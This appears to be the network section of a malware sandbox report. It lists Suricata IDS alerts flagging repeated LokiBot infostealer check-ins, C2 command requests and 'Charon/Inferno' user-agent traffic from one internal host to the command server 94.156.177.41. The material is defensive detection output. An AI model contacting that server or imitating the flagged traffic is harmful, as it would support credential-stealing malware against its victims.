Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50092 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50077 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50086 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50086 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50086 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50033 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50086 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50017 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50015 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50015 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50015 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50015 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50031 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50089 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50089 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50089 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50089 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50097 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50097 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50097 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50097 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50099 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50099 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50099 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50099 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50094 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50094 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50094 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50094 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50098 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50098 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50098 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50098 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50104 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50104 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50104 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50104 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50100 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50100 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50100 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50100 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50068 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50069 -> 94.156.177.41:80
